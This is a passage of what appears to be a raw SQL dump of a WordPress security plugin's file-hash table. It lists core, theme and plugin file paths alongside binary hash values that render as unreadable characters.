x�T>!*dlL�','wp-content/themes/regina-lite/layout/js/plugins/navigation/navigation.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�O`~�H��_�c(\n1S','��+�̧pE�w{��nR�AzW�Ҏ�Цy�Ɉ','',0,'?'),('ѷ&\Z �{j�\"+��7�','wp-content/themes/doctors/core/contents/loop_tag/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؑ�q��]0���yS��','�wfxW�<P�\'O�M���-|n�f�V�|�','',0,'?'),('�٣�d:����sL`m','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�щ���.�B���W�','Aƾ�|n8�\\�����k%�J����[��!','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'��ŭ�H��D,�o�ӷ','��ŭ�H��D,�o�ӷ',' ��ݾ����8��m\0t�R�z)�`�o�R�@','',0,'?'),('��Ejׁ�1����i�','wp-content/themes/healthcare/css/font-awesome/scss/_rotated-flipped.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]K�ި�(Ҫ�et��','�8�n��K١�:����Q�v�S���n','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2 B��b4��8�Tb','g. �YZ��:Y�(�m�<�bB6�<����hX\"�','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;TvCg�)Cb\r',';hT�*�ݠO���mVggd�\n�@Pp6{}','',0,'?'),('�Am|��7��f��','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-palette-control.php',0,'e�I=���\n�-�r�9','e�I=���\n�-�r�9','��M������;2h�%�~�!_�myt��;b','',0,'?'),('�MK�ă^w����8 ','wp-content/plugins/disable-gutenberg/js/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x!}m��AL�\Z�V\'�','��� Tɛ!�g;{�H�GE�\r�p��O��he','',0,'?'),('�at ��L�<�T��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-text-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)���vV�,*��','��\n��������RsS��ZiKQ��ᆮO','',0,'?'),('�wE�7E��0\n��y�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/section-repeater/section-repeater-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y+R�Yyp L�ugA','Ćf�xʝU�4��\\/����(���Z<I�\"�','',0,'?'),('�x\nA[�*ZxS��9�NY','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<�[2� �[\r�','bK���76V��P9$GA;&e�k�����','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�Zqf���@1cR�A','d%�ZAp�N��q�ϲ<|$����\Z����o���n','',0,'?'),('Ҟ���ǟ� Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~ܯ4��v�\0','�W��Po�Ep�x�]�%i1~Y\'$��]��U','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�\"H�$V���j��','Ǝͱ�e\Z�����N�hԊ_���.����A','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<Ya��g�v��U�C','�K����d�����Sj`ݝ���G�`���#�','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N� ��P�{��','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�O�I�����Iԥ{','9YZ��A}7�=��:�\'Fo�G�\'�R�ɹ�_-','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'���^��R�5YwL}','���^��R�5YwL}','��f��1B �w$5�����F�қ\"L','',0,'?'),('�[�:�S���h ˸�','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<1����!\0�o��','#@^�=}l5�@���W���sa� #a� ��V','',0,'?'),('�`�W�^o �s�r��','wp-content/themes/wp-barrister/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�:3�t��QQ�q','6yI��E�\Z���D���\n��[�]Ŵ��M','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��A��a�<�ά','�9ti?L\r���E��-,�*���<�a\\=�i�a','',0,'?'),('�r�F���l,Y��','wp-content/themes/healthcare/css/font-awesome/scss/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�2�s7؈_���','{�u���D�v���1t�s������œ)��','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�~_کk_�l\n��','�vC.z-�N�Y��� �C�<����ccl','',0,'?'),('�s�G������S4�','wp-content/plugins/wp-cerber/assets/flags/ca.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�1���I��;pl�s�','��Bx���zU�O.�.t��XB�@ͤ��%��','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�܀ ���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�l-��y4Ngp0','wp-content/themes/twentytwentyone/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�F\ZLO�k:�','Z�8��!!�P���8~�\0����e��h','',0,'?'),('ӌ�<�_���\Z��','wp-content/themes/healthcare/images/Healthcare.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�U���?�ݺiζ*','!�\0!U:��\'7珻���L�]>��e�n�b�','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�D�P�y��n�\\B�','�AQY��tQ�aK hˤ�+\r�+�x,`�','',0,'?'),('Ӱ�@p���� 5x�P','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��;��MS�\nQd�ڇ','&жd�I�I��2�8!�.!�е�̼���u�','',0,'?'),('�Ҡ�5�������i*Ǡ','wp-content/plugins/wp-cerber/assets/flags/ms.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֠��G/�������Ҳ','�cZ��/�n�[�`��=\Z4�~��+�)%�k�','',0,'?'),('��>Zb�o&����','wp-content/plugins/akismet/views/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ܥ&F�e@`','ۑ�&\Z錷�ې7�~�����rb�','',0,'?'),('��_��XW~>b��','wp-content/themes/advance/inc/kirki/assets/js/controls/preset.js',0,'�r��N�4o�w����','�r��N�4o�w����','�����C��X���c���L����h�T4jj','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^g�v~�9Qu�i�\r�','+���ƱO�N6���,�F���]�ڷ�O��/','',0,'?'),('���/�\"uކ�bGT�p','wp-content/themes/doctors/core/contents/loop_post/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h��z@��','Ϧ]J�N�xp��wg��z[!�9�l�=\r','',0,'?'),('�w� ���v�M�z','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php',0,' ���K$�N�{�E� ',' ���K$�N�{�E� ','z6�Up�^$(J,m]��y�v*�(��\r�t�','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('���v�2���/����','wp-content/themes/regina-lite/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]`BRJ�-Z\0ݕ��','�s���9��t�2%�{b�ى��+�2�Oq��','',0,'?'),('�|@N�C_�_E�','wp-content/themes/doctors/core/customizer/help/_text_color_alt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�Iⷋ��YC����','%�荁g���gz�?��-�ܮ�ڈOC�n*;�','',0,'?'),('�9��4ۏ�����op','wp-content/themes/doctors/core/contents/part_footerWidgets/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�p5��3��_vt��','䆋ٸi�~a�3����鍺8˰��}w6��JP','',0,'?'),('�].�oo�ȦM-n �','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S����Y����S`','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Tf������','��`�<���DadXjM� <��\r[j�ߕA�m','',0,'?'),('�xE����8���8�I','wp-content/themes/vision-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��\r��!�aL�Ɖ','���3٘�����5!i�����U9�V�c\rG','',0,'?'),('Ԅq�#�w��!P��\Z��','wp-content/themes/vision-lite/customize-pro/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m.8i��~�|v۞','U4Y��6�5��T�8�dۆqD0g�Z$T֔:','',0,'?'),('Ԋ�\0T,��`��G��','wp-content/themes/advance/category.php',0,'#i�-J�9�;�Yn��V','#i�-J�9�;�Yn��V','\\o��Ԁ3o��F��0fg[\r�x8ȵ�E��oc','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�P=C�g �\'L�','g��G�a$�E������˘UQbyħ�+','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I ���g\0�����a�B','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;� KAH9Q�@� ����B~�','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝ̢����VN3����','cm[Tl5����Qy;��w0��N!<��/躬�','',0,'?'),('�\Z3 b�ws0{/!Bm�','wp-content/plugins/wp-cerber/assets/flags/lu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#x�I���@K���','��f\0�4����;)��x�6ҽՖx�&X��w�v','',0,'?'),('�@GJ�\0�A\0W��F','wp-content/themes/healthcare/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�.�&E���}H','��\0��2��t4�M��x�w����j��2�lM���','',0,'?'),('�%f��G���Pѣ��','wp-content/themes/twentytwenty/singular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9�&)e�k�i','�^��~��1o�U���K�����?[�*����','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE� ���','',0,'?'),('�G�h˲�;��\'ݷ�/','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j|�ZY����P','���:.P��BIP��i�l�� 9h��� �j� ','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8;����2��/���G','�e\\���%��`#J˘��\n��Ú�n��̭7�','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţ% \Z�@1<��L��','Z]��5�㮊���c-N�|Wr��*#�H�U=E','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('ՙ�5qV��#Y�','wp-content/plugins/wp-cerber/assets/flags/ro.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�N����C�Eѩ-�','�J7d[�^k`�\0v�?ł�;%`a[)','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('���Xx�h�@S_o0��','wp-content/themes/wp-barrister/library/images/favicon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\Zk/f�A}�','x��\"�\Z��\r��0����Y�ӱ7��?�','',0,'?'),('�:���HP�q�O��x','wp-content/themes/regina-lite/layout/css/owl-transitions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�,�y�V�\\��?��','�]���Az��`��x����bZ���� �%�E','',0,'?'),('��}��m��Wd,���','wp-content/themes/weblog/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1}�͈��(�p��VKu','f���r���Kv{e��B�n�4t��q^d�\'','',0,'?'),('�Q|�O\\��iqʼnu0','wp-content/plugins/redirection/api/api-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q6�K����L�� �','xm�8�f�K����F����Hɋ���e��','',0,'?'),('�X�h�Z$�$mO2','wp-content/themes/healing-touch/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��Ü���S ','��i\r���� �*�#8d;��2۪ }�Ef','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z� r!ޏf��� �','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s `�A���;�y_���<��X�\Z�%Y�','',0,'?'),('��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~���4��','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���-[�\0:�&��','',0,'?'),('��<��b�XUM�@\\!','wp-content/plugins/wp-cerber/assets/flags/pt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��,t7s\'��=K^','qd<Q\Z�fe�-� %�7��5[�1�+i�uG�','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �(�J\Z+x��,�','8�t�Ä���W�#��ښ�̟�+_@C����','',0,'?'),('�I� J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��\\�б�(�\"��E','}|N�on-����q(\\��F�SX�i\'��$','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�P!����}�S�Ұ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,W�� �)��,�^�m','G+xڍaȴѾ䄮�C\0B��,��L��w','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�|�WaU\0��κ�Ht','�B&�VJ�ŋd�#�l�f��c;�}3T�%K{','',0,'?'),('�l�����3V� \r','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dashicons.php',0,'3ˢ$��Krǡ)Fb��','3ˢ$��Krǡ)Fb��','�tM�V_d�B���A��4�D�ڇ��ǒ}��3 (','',0,'?'),('�n\\w�;\\]Ǜ��#�','wp-content/themes/twentynineteen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�������:�t','yg�۱���Jg��zV��x�����=H�','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('�{��wk5�%����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N�?l�1���FsT^','�\0+\"\"��:*8l��Ia�-(��/\rsL�','',0,'?'),('ׄƿEH=�@�.>��','wp-content/themes/regina-lite/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�w���F�\\��4\\','a���8[�\"F���åu�K��x�h�6�\r��','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���NX���\\m��','P��[H{lW�@\0!�!��s�_�/j�F�Č�','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\%�9��,\rY\Z�+N','\"�&��=+�3ʰ�;��\r�I[h�NY���','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('�����C|���Pf��','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('�ahH�N�Ѓ(?>�','wp-content/themes/advance/headers/part-head1.php',0,'�R@]Af �#�V�i�N','�R@]Af �#�V�i�N','�o�Y��@�8�H�C�����*\n��l�','',0,'?'),('��<Q����_4�t','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{G��(�땤h��','z��Х��Y���\'R�H�y��Ri�V~��\nȿy�','',0,'?'),('� Y�r��y5�\\i�','wp-content/themes/skt-toothy/images/page-image-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�$�\'9P�`�','�5O�g�M�����#���f�PD��&E\"�D�','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^ �σ�7�2��7�{','',0,'?'),('�,��Z§*��mEB��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/range-sliders.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>J�`��m\n8%B','m�R�OzC�S��H�F��/��U�f��1��@D�','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�m�|�<��(`�','6\r6\r�@�u<�z(�_�����0�v�*�','',0,'?'),('�C>��J����w��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѡ�F�hO\nȆ=�b�','�NrR�\0�Λ$�FN�Y���C%��m�\rK*�','',0,'?'),('�H�[\\�3�|Yzo@','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/panels/regular/regular.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�z��ku�)-�<K','AG��%N?�LQ=4��c�yO���\',�@�b','',0,'?'),('�gi��Rk����H��\"\Z','wp-content/themes/wp-barrister/library/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�\Z�2�r�)�g�+','�S����j����I�Z�JK(�8�d�����','',0,'?'),('�o�ǣ� ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A �<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��H�Y��SAK�k�\n�','�M��$N}�IF��)M����`\r�c�*�Q4��\'\n','',0,'?'),('ط�;����\0���','wp-content/plugins/wp-cerber/assets/flags/cy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o||/$�B���l','븻�Òc���.\"��0C�i+\Z�\Z�{pċ����a','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('ؾ��U9���;Y��u','wp-content/themes/advance/author.php',0,'�;�z#�K^u,,�\'','�;�z#�K^u,,�\'','�X�[�DKVmP��v�qB��}�ux�\'3o��Jk','',0,'?'),('�φ{)�e]�ŝ�4ܴ�','wp-content/plugins/wp-cerber/assets/flags/sc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���\'hz�\Z�uR�m�','1W��b�[^\'�J�Z�O��\0.\n )����','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�I�k���o���^?\n�','��\0.����ɕ�`� 